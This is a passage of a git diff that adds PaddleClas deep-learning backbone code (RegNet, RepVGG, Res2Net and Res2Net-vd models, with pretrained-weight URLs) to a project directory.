stem_type = "simple_stem_in" + stem_w = 32 + block_type = "res_bottleneck_block" + + self.conv = ConvBNLayer( + num_channels=3, + num_filters=stem_w, + filter_size=3, + stride=2, + padding=1, + act="relu", + name="stem_conv") + + self.block_list = [] + for block, (d, w_out, stride, bm, gw) in enumerate(stage_params): + shortcut = False + for i in range(d): + num_channels = stem_w if block == i == 0 else in_channels + # Stride apply to the first block of the stage + b_stride = stride if i == 0 else 1 + 
conv_name = "s" + str(block + 1) + "_b" + str(i + + 1) # chr(97 + i) + bottleneck_block = self.add_sublayer( + conv_name, + BottleneckBlock( + num_channels=num_channels, + num_filters=w_out, + stride=b_stride, + bm=bm, + gw=gw, + se_on=se_on, + se_r=se_r, + shortcut=shortcut, + name=conv_name)) + in_channels = w_out + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = w_out + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_0.w_0"), + bias_attr=ParamAttr(name="fc_0.b_0")) + + def forward(self, inputs): + y = self.conv(inputs) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." 
+ ) + + +def RegNetX_200MF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=36.44, + w_0=24, + w_m=2.49, + d=13, + group_w=8, + bot_mul=1.0, + q=8, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_200MF"], use_ssld=use_ssld) + return model + + +def RegNetX_4GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=38.65, + w_0=96, + w_m=2.43, + d=23, + group_w=40, + bot_mul=1.0, + q=8, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_4GF"], use_ssld=use_ssld) + return model + + +def RegNetX_32GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=69.86, + w_0=320, + w_m=2.0, + d=23, + group_w=168, + bot_mul=1.0, + q=8, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model + + +def RegNetY_200MF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=36.44, + w_0=24, + w_m=2.49, + d=13, + group_w=8, + bot_mul=1.0, + q=8, + se_on=True, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model + + +def RegNetY_4GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=31.41, + w_0=96, + w_m=2.24, + d=22, + group_w=64, + bot_mul=1.0, + q=8, + se_on=True, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model + + +def RegNetY_32GF(pretrained=False, use_ssld=False, **kwargs): + model = RegNet( + w_a=115.89, + w_0=232, + w_m=2.53, + d=20, + group_w=232, + bot_mul=1.0, + q=8, + se_on=True, + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["RegNetX_32GF"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/repvgg.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/repvgg.py new file mode 100644 index 0000000..94b9355 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/repvgg.py @@ -0,0 +1,406 @@ +import paddle.nn as nn +import paddle +import numpy as np + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "RepVGG_A0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_A0_pretrained.pdparams", + "RepVGG_A1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_A1_pretrained.pdparams", + "RepVGG_A2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_A2_pretrained.pdparams", + "RepVGG_B0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B0_pretrained.pdparams", + "RepVGG_B1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B1_pretrained.pdparams", + "RepVGG_B2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B2_pretrained.pdparams", + "RepVGG_B3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B3_pretrained.pdparams", + "RepVGG_B1g2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B1g2_pretrained.pdparams", + "RepVGG_B1g4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B1g4_pretrained.pdparams", + "RepVGG_B2g2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B2g2_pretrained.pdparams", + "RepVGG_B2g4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B2g4_pretrained.pdparams", + "RepVGG_B3g2": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B3g2_pretrained.pdparams", + "RepVGG_B3g4": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/RepVGG_B3g4_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + +optional_groupwise_layers = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26] +g2_map = {l: 2 for l in optional_groupwise_layers} +g4_map = {l: 4 for l in optional_groupwise_layers} + + +class ConvBN(nn.Layer): + def __init__(self, + in_channels, + out_channels, + 
kernel_size, + stride, + padding, + groups=1): + super(ConvBN, self).__init__() + self.conv = nn.Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + groups=groups, + bias_attr=False) + self.bn = nn.BatchNorm2D(num_features=out_channels) + + def forward(self, x): + y = self.conv(x) + y = self.bn(y) + return y + + +class RepVGGBlock(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size, + stride=1, + padding=0, + dilation=1, + groups=1, + padding_mode='zeros'): + super(RepVGGBlock, self).__init__() + self.in_channels = in_channels + self.out_channels = out_channels + self.kernel_size = kernel_size + self.stride = stride + self.padding = padding + self.dilation = dilation + self.groups = groups + self.padding_mode = padding_mode + + assert kernel_size == 3 + assert padding == 1 + + padding_11 = padding - kernel_size // 2 + + self.nonlinearity = nn.ReLU() + + self.rbr_identity = nn.BatchNorm2D( + num_features=in_channels + ) if out_channels == in_channels and stride == 1 else None + self.rbr_dense = ConvBN( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + groups=groups) + self.rbr_1x1 = ConvBN( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=1, + stride=stride, + padding=padding_11, + groups=groups) + + def forward(self, inputs): + if not self.training: + return self.nonlinearity(self.rbr_reparam(inputs)) + + if self.rbr_identity is None: + id_out = 0 + else: + id_out = self.rbr_identity(inputs) + return self.nonlinearity( + self.rbr_dense(inputs) + self.rbr_1x1(inputs) + id_out) + + def eval(self): + if not hasattr(self, 'rbr_reparam'): + self.rbr_reparam = nn.Conv2D( + in_channels=self.in_channels, + out_channels=self.out_channels, + kernel_size=self.kernel_size, + stride=self.stride, + padding=self.padding, + dilation=self.dilation, + groups=self.groups, + 
            padding_mode=self.padding_mode)
        # Switch the block to inference mode: fold the trained multi-branch
        # weights into the single re-parameterized 3x3 conv and freeze it.
        self.training = False
        kernel, bias = self.get_equivalent_kernel_bias()
        self.rbr_reparam.weight.set_value(kernel)
        self.rbr_reparam.bias.set_value(bias)
        for layer in self.sublayers():
            layer.eval()

    def get_equivalent_kernel_bias(self):
        """Fuse the 3x3, 1x1 and identity branches into one 3x3 kernel/bias pair."""
        kernel3x3, bias3x3 = self._fuse_bn_tensor(self.rbr_dense)
        kernel1x1, bias1x1 = self._fuse_bn_tensor(self.rbr_1x1)
        kernelid, biasid = self._fuse_bn_tensor(self.rbr_identity)
        return kernel3x3 + self._pad_1x1_to_3x3_tensor(
            kernel1x1) + kernelid, bias3x3 + bias1x1 + biasid

    def _pad_1x1_to_3x3_tensor(self, kernel1x1):
        # Zero-pad a 1x1 kernel to 3x3 so it can be summed with the dense
        # branch; an absent branch contributes 0 to the sum.
        if kernel1x1 is None:
            return 0
        else:
            return nn.functional.pad(kernel1x1, [1, 1, 1, 1])

    def _fuse_bn_tensor(self, branch):
        """Fold a branch's BatchNorm statistics into an equivalent conv kernel/bias.

        Returns (0, 0) for an absent branch. For the BN-only identity branch a
        one-hot "identity" 3x3 kernel is synthesized once and cached as
        ``self.id_tensor`` so the same fusion formula applies to all branches.
        """
        if branch is None:
            return 0, 0
        if isinstance(branch, ConvBN):
            kernel = branch.conv.weight
            running_mean = branch.bn._mean
            running_var = branch.bn._variance
            gamma = branch.bn.weight
            beta = branch.bn.bias
            eps = branch.bn._epsilon
        else:
            assert isinstance(branch, nn.BatchNorm2D)
            if not hasattr(self, 'id_tensor'):
                input_dim = self.in_channels // self.groups
                kernel_value = np.zeros(
                    (self.in_channels, input_dim, 3, 3), dtype=np.float32)
                for i in range(self.in_channels):
                    kernel_value[i, i % input_dim, 1, 1] = 1
                self.id_tensor = paddle.to_tensor(kernel_value)
            kernel = self.id_tensor
            running_mean = branch._mean
            running_var = branch._variance
            gamma = branch.weight
            beta = branch.bias
            eps = branch._epsilon
        # Standard conv+BN fusion: w' = w * gamma/std, b' = beta - mean*gamma/std.
        std = (running_var + eps).sqrt()
        t = (gamma / std).reshape((-1, 1, 1, 1))
        return kernel * t, beta - running_mean * gamma / std


class RepVGG(nn.Layer):
    """RepVGG backbone: stage0 stem + four RepVGGBlock stages + GAP + linear head.

    Args:
        num_blocks: per-stage block counts, length 4.
        width_multiplier: per-stage channel multipliers, length 4 (required).
        override_groups_map: optional {global block index: groups} for the
            grouped-conv variants (g2/g4); 0 is an invalid group count.
        class_num: classifier output dimension.
    """

    def __init__(self,
                 num_blocks,
                 width_multiplier=None,
                 override_groups_map=None,
                 class_num=1000):
        super(RepVGG, self).__init__()

        assert len(width_multiplier) == 4
        self.override_groups_map = override_groups_map or dict()

        assert 0 not in self.override_groups_map

        # Stem width is capped at 64 even when the multiplier exceeds 1.
        self.in_planes = min(64, int(64 * width_multiplier[0]))

        self.stage0 = RepVGGBlock(
            in_channels=3,
            out_channels=self.in_planes,
            kernel_size=3,
            stride=2,
            padding=1)
        # Global block counter used as the key into override_groups_map.
        self.cur_layer_idx = 1
        self.stage1 = self._make_stage(
            int(64 * width_multiplier[0]), num_blocks[0], stride=2)
        self.stage2 = self._make_stage(
            int(128 * width_multiplier[1]), num_blocks[1], stride=2)
        self.stage3 = self._make_stage(
            int(256 * width_multiplier[2]), num_blocks[2], stride=2)
        self.stage4 = self._make_stage(
            int(512 * width_multiplier[3]), num_blocks[3], stride=2)
        self.gap = nn.AdaptiveAvgPool2D(output_size=1)
        self.linear = nn.Linear(int(512 * width_multiplier[3]), class_num)

    def _make_stage(self, planes, num_blocks, stride):
        # First block of the stage downsamples; the rest keep resolution.
        strides = [stride] + [1] * (num_blocks - 1)
        blocks = []
        for stride in strides:
            cur_groups = self.override_groups_map.get(self.cur_layer_idx, 1)
            blocks.append(
                RepVGGBlock(
                    in_channels=self.in_planes,
                    out_channels=planes,
                    kernel_size=3,
                    stride=stride,
                    padding=1,
                    groups=cur_groups))
            self.in_planes = planes
            self.cur_layer_idx += 1
        return nn.Sequential(*blocks)

    def eval(self):
        # NOTE(review): layer.eval() already clears layer.training, so the
        # explicit assignment is redundant but harmless.
        self.training = False
        for layer in self.sublayers():
            layer.training = False
            layer.eval()

    def forward(self, x):
        out = self.stage0(x)
        out = self.stage1(out)
        out = self.stage2(out)
        out = self.stage3(out)
        out = self.stage4(out)
        out = self.gap(out)
        out = paddle.flatten(out, start_axis=1)
        out = self.linear(out)
        return out


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Load weights per `pretrained`: False = skip, True = download from
    `model_url`, str = local checkpoint path. Raises RuntimeError otherwise."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


# Factory functions below instantiate the published RepVGG variants; the
# num_blocks / width_multiplier values define the architecture names.
def RepVGG_A0(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[2, 4, 14, 1],
        width_multiplier=[0.75, 0.75, 0.75, 2.5],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_A0"], use_ssld=use_ssld)
    return model


def RepVGG_A1(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[2, 4, 14, 1],
        width_multiplier=[1, 1, 1, 2.5],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_A1"], use_ssld=use_ssld)
    return model


def RepVGG_A2(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[2, 4, 14, 1],
        width_multiplier=[1.5, 1.5, 1.5, 2.75],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_A2"], use_ssld=use_ssld)
    return model


def RepVGG_B0(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[1, 1, 1, 2.5],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B0"], use_ssld=use_ssld)
    return model


def RepVGG_B1(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[2, 2, 2, 4],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B1"], use_ssld=use_ssld)
    return model


def RepVGG_B1g2(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[2, 2, 2, 4],
        override_groups_map=g2_map,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B1g2"], use_ssld=use_ssld)
    return model


def RepVGG_B1g4(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[2, 2, 2, 4],
        override_groups_map=g4_map,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B1g4"], use_ssld=use_ssld)
    return model


def RepVGG_B2(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[2.5, 2.5, 2.5, 5],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B2"], use_ssld=use_ssld)
    return model


def RepVGG_B2g2(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[2.5, 2.5, 2.5, 5],
        override_groups_map=g2_map,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B2g2"], use_ssld=use_ssld)
    return model


def RepVGG_B2g4(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[2.5, 2.5, 2.5, 5],
        override_groups_map=g4_map,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B2g4"], use_ssld=use_ssld)
    return model


def RepVGG_B3(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[3, 3, 3, 5],
        override_groups_map=None,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B3"], use_ssld=use_ssld)
    return model


def RepVGG_B3g2(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[3, 3, 3, 5],
        override_groups_map=g2_map,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B3g2"], use_ssld=use_ssld)
    return model


def RepVGG_B3g4(pretrained=False, use_ssld=False, **kwargs):
    model = RepVGG(
        num_blocks=[4, 6, 16, 1],
        width_multiplier=[3, 3, 3, 5],
        override_groups_map=g4_map,
        **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["RepVGG_B3g4"], use_ssld=use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net.py
new file mode 100644
index 0000000..191cc84
--- /dev/null
+++
b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net.py
@@ -0,0 +1,264 @@
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np
import paddle
from paddle import ParamAttr
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
from paddle.nn.initializer import Uniform

import math

from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

MODEL_URLS = {
    "Res2Net50_26w_4s":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net50_26w_4s_pretrained.pdparams",
    "Res2Net50_14w_8s":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net50_14w_8s_pretrained.pdparams",
}

__all__ = list(MODEL_URLS.keys())


class ConvBNLayer(nn.Layer):
    """Conv2D + BatchNorm with checkpoint-coupled parameter names.

    The weight/BN names derived from `name` must match the released
    pretrained checkpoints — do not change the naming scheme.
    """

    def __init__(
            self,
            num_channels,
            num_filters,
            filter_size,
            stride=1,
            groups=1,
            act=None,
            name=None, ):
        super(ConvBNLayer, self).__init__()

        self._conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=(filter_size - 1) // 2,
            groups=groups,
            weight_attr=ParamAttr(name=name + "_weights"),
            bias_attr=False)
        # BN names follow the legacy static-graph convention: "bn_conv1" for
        # the stem, "bn" + name[3:] (strips the "res" prefix) elsewhere.
        if name == "conv1":
            bn_name = "bn_" + name
        else:
            bn_name = "bn" + name[3:]
        self._batch_norm = BatchNorm(
            num_filters,
            act=act,
            param_attr=ParamAttr(name=bn_name + '_scale'),
            bias_attr=ParamAttr(bn_name + '_offset'),
            moving_mean_name=bn_name + '_mean',
            moving_variance_name=bn_name + '_variance')

    def forward(self, inputs):
        y = self._conv(inputs)
        y = self._batch_norm(y)
        return y


class BottleneckBlock(nn.Layer):
    """Res2Net bottleneck: 1x1 reduce, hierarchical 3x3 convs over `scales`
    splits, 1x1 expand, residual add.

    NOTE(review): the `if_first` argument is accepted but never used in this
    (non-vd) variant; it is meaningful only in res2net_vd.py.
    """

    def __init__(self,
                 num_channels1,
                 num_channels2,
                 num_filters,
                 stride,
                 scales,
                 shortcut=True,
                 if_first=False,
                 name=None):
        super(BottleneckBlock, self).__init__()
        self.stride = stride
        self.scales = scales
        self.conv0 = ConvBNLayer(
            num_channels=num_channels1,
            num_filters=num_filters,
            filter_size=1,
            act='relu',
            name=name + "_branch2a")
        # One 3x3 conv per split except the last; the last split is passed
        # through (stride 1) or average-pooled (stride 2) in forward().
        self.conv1_list = []
        for s in range(scales - 1):
            conv1 = self.add_sublayer(
                name + '_branch2b_' + str(s + 1),
                ConvBNLayer(
                    num_channels=num_filters // scales,
                    num_filters=num_filters // scales,
                    filter_size=3,
                    stride=stride,
                    act='relu',
                    name=name + '_branch2b_' + str(s + 1)))
            self.conv1_list.append(conv1)
        self.pool2d_avg = AvgPool2D(kernel_size=3, stride=stride, padding=1)

        self.conv2 = ConvBNLayer(
            num_channels=num_filters,
            num_filters=num_channels2,
            filter_size=1,
            act=None,
            name=name + "_branch2c")

        if not shortcut:
            self.short = ConvBNLayer(
                num_channels=num_channels1,
                num_filters=num_channels2,
                filter_size=1,
                stride=stride,
                name=name + "_branch1")

        self.shortcut = shortcut

    def forward(self, inputs):
        y = self.conv0(inputs)
        xs = paddle.split(y, self.scales, 1)
        ys = []
        # Hierarchical residual connections: each split (after the first, and
        # unless downsampling) receives the previous split's output.
        for s, conv1 in enumerate(self.conv1_list):
            if s == 0 or self.stride == 2:
                ys.append(conv1(xs[s]))
            else:
                ys.append(conv1(paddle.add(xs[s], ys[-1])))
        if self.stride == 1:
            ys.append(xs[-1])
        else:
            ys.append(self.pool2d_avg(xs[-1]))
        conv1 = paddle.concat(ys, axis=1)
        conv2 = self.conv2(conv1)

        if self.shortcut:
            short = inputs
        else:
            short = self.short(inputs)
        y = paddle.add(x=short, y=conv2)
        y = F.relu(y)
        return y


class Res2Net(nn.Layer):
    """Res2Net backbone (non-vd stem): 7x7 conv stem + 4 bottleneck stages.

    Args:
        layers: network depth, one of {50, 101, 152, 200}.
        scales: number of feature splits per bottleneck.
        width: base width per split.
        class_num: classifier output dimension.
    """

    def __init__(self, layers=50, scales=4, width=26, class_num=1000):
        super(Res2Net, self).__init__()

        self.layers = layers
        self.scales = scales
        self.width = width
        basic_width = self.width * self.scales
        supported_layers = [50, 101, 152, 200]
        assert layers in supported_layers, \
            "supported layers are {} but input layer is {}".format(
                supported_layers, layers)

        if layers == 50:
            depth = [3, 4, 6, 3]
        elif layers == 101:
            depth = [3, 4, 23, 3]
        elif layers == 152:
            depth = [3, 8, 36, 3]
        elif layers == 200:
            depth = [3, 12, 48, 3]
        num_channels = [64, 256, 512, 1024]
        num_channels2 = [256, 512, 1024, 2048]
        num_filters = [basic_width * t for t in [1, 2, 4, 8]]

        self.conv1 = ConvBNLayer(
            num_channels=3,
            num_filters=64,
            filter_size=7,
            stride=2,
            act='relu',
            name="conv1")
        self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1)

        self.block_list = []
        for block in range(len(depth)):
            shortcut = False
            for i in range(depth[block]):
                # Legacy naming: deep stage-3 nets use "res4b<N>"; others use
                # letter suffixes. NOTE(review): unlike res2net_vd.py this
                # check omits 200, so layers=200 would index chr(97+i) past
                # 'z' for its 48 blocks — confirm before exposing a 200-layer
                # factory here.
                if layers in [101, 152] and block == 2:
                    if i == 0:
                        conv_name = "res" + str(block + 2) + "a"
                    else:
                        conv_name = "res" + str(block + 2) + "b" + str(i)
                else:
                    conv_name = "res" + str(block + 2) + chr(97 + i)
                bottleneck_block = self.add_sublayer(
                    'bb_%d_%d' % (block, i),
                    BottleneckBlock(
                        num_channels1=num_channels[block]
                        if i == 0 else num_channels2[block],
                        num_channels2=num_channels2[block],
                        num_filters=num_filters[block],
                        stride=2 if i == 0 and block != 0 else 1,
                        scales=scales,
                        shortcut=shortcut,
                        if_first=block == i == 0,
                        name=conv_name))
                self.block_list.append(bottleneck_block)
                shortcut = True

        self.pool2d_avg = AdaptiveAvgPool2D(1)

        self.pool2d_avg_channels = num_channels[-1] * 2

        stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0)

        self.out = Linear(
            self.pool2d_avg_channels,
            class_num,
            weight_attr=ParamAttr(
                initializer=Uniform(-stdv, stdv), name="fc_weights"),
            bias_attr=ParamAttr(name="fc_offset"))

    def forward(self, inputs):
        y = self.conv1(inputs)
        y = self.pool2d_max(y)
        for block in self.block_list:
            y = block(y)
        y = self.pool2d_avg(y)
        y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels])
        y = self.out(y)
        return y


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Load weights per `pretrained`: False = skip, True = download from
    `model_url`, str = local checkpoint path. Raises RuntimeError otherwise."""
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def Res2Net50_26w_4s(pretrained=False, use_ssld=False, **kwargs):
    model = Res2Net(layers=50, scales=4, width=26, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["Res2Net50_26w_4s"], use_ssld=use_ssld)
    return model


def Res2Net50_14w_8s(pretrained=False, use_ssld=False, **kwargs):
    model = Res2Net(layers=50, scales=8, width=14, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["Res2Net50_14w_8s"], use_ssld=use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net_vd.py
new file mode 100644
index 0000000..a375679
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/res2net_vd.py
@@ -0,0 +1,305 @@
# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import numpy as np
import paddle
from paddle import ParamAttr
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.nn import Conv2D, BatchNorm, Linear, Dropout
from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
from paddle.nn.initializer import Uniform

import math

from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

MODEL_URLS = {
    "Res2Net50_vd_26w_4s":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net50_vd_26w_4s_pretrained.pdparams",
    "Res2Net101_vd_26w_4s":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net101_vd_26w_4s_pretrained.pdparams",
    "Res2Net200_vd_26w_4s":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/Res2Net200_vd_26w_4s_pretrained.pdparams",
}

__all__ = list(MODEL_URLS.keys())


class ConvBNLayer(nn.Layer):
    """Conv2D + BatchNorm with optional "vd" downsampling (2x2 avg-pool
    applied before the conv on downsampling shortcuts).

    Parameter names derived from `name` must match the released pretrained
    checkpoints — do not change the naming scheme.
    """

    def __init__(
            self,
            num_channels,
            num_filters,
            filter_size,
            stride=1,
            groups=1,
            is_vd_mode=False,
            act=None,
            name=None, ):
        super(ConvBNLayer, self).__init__()

        self.is_vd_mode = is_vd_mode
        self._pool2d_avg = AvgPool2D(
            kernel_size=2, stride=2, padding=0, ceil_mode=True)
        self._conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=(filter_size - 1) // 2,
            groups=groups,
            weight_attr=ParamAttr(name=name + "_weights"),
            bias_attr=False)
        # BN names follow the legacy static-graph convention.
        if name == "conv1":
            bn_name = "bn_" + name
        else:
            bn_name = "bn" + name[3:]
        self._batch_norm = BatchNorm(
            num_filters,
            act=act,
            param_attr=ParamAttr(name=bn_name + '_scale'),
            bias_attr=ParamAttr(bn_name + '_offset'),
            moving_mean_name=bn_name + '_mean',
            moving_variance_name=bn_name + '_variance')

    def forward(self, inputs):
        if self.is_vd_mode:
            inputs = self._pool2d_avg(inputs)
        y = self._conv(inputs)
        y = self._batch_norm(y)
        return y


class BottleneckBlock(nn.Layer):
    """Res2Net-vd bottleneck: like res2net.py's block, but the downsampling
    shortcut uses avg-pool + stride-1 1x1 conv (the "vd" trick) except on the
    very first block (`if_first`)."""

    def __init__(self,
                 num_channels1,
                 num_channels2,
                 num_filters,
                 stride,
                 scales,
                 shortcut=True,
                 if_first=False,
                 name=None):
        super(BottleneckBlock, self).__init__()
        self.stride = stride
        self.scales = scales
        self.conv0 = ConvBNLayer(
            num_channels=num_channels1,
            num_filters=num_filters,
            filter_size=1,
            act='relu',
            name=name + "_branch2a")
        # One 3x3 conv per split except the last, which is passed through or
        # average-pooled in forward().
        self.conv1_list = []
        for s in range(scales - 1):
            conv1 = self.add_sublayer(
                name + '_branch2b_' + str(s + 1),
                ConvBNLayer(
                    num_channels=num_filters // scales,
                    num_filters=num_filters // scales,
                    filter_size=3,
                    stride=stride,
                    act='relu',
                    name=name + '_branch2b_' + str(s + 1)))
            self.conv1_list.append(conv1)
        self.pool2d_avg = AvgPool2D(kernel_size=3, stride=stride, padding=1)

        self.conv2 = ConvBNLayer(
            num_channels=num_filters,
            num_filters=num_channels2,
            filter_size=1,
